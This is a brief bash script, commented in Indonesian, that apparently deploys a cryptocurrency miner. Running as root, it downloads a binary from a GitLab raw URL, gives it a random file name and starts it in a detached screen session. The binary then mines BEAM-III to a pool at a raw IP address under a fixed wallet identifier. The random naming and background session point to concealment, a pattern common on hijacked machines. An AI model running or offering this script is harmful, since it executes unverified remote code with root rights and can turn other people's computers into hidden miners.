#!/bin/bash
sudo su <<EOF
sudo apt install screen -y
# Generate nama folder acak (misalnya, 8 karakter alfanumerik)
NAMA_FOLDER=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)

# Buat folder dengan nama acak
mkdir -p "$NAMA_FOLDER"

# Masuk ke dalam folder
cd "$NAMA_FOLDER" || { echo "Gagal masuk ke folder $NAMA_FOLDER."; exit 1; }

# Tampilkan pesan sukses
echo "Folder '$NAMA_FOLDER' berhasil dibuat dan Anda sekarang berada di dalamnya."
sleep 2
wget -qO $NAMA_FOLDER https://gitlab.com/sarifadim/jomblo/-/raw/main/sagu && chmod +x $NAMA_FOLDER &&
screen -dms run ./$NAMA_FOLDER --algo BEAM-III --pool 47.236.123.51:80 --user 35abc183df02cef8b5ab05ea3df9ecf5e1b8bbeb8ccc0bdb7a27073e80621131c4e.$(echo 0J-$(TZ=UTC-7 date +"%H-%M-%S")) --tls enable --no-cl
EOF
screen -r
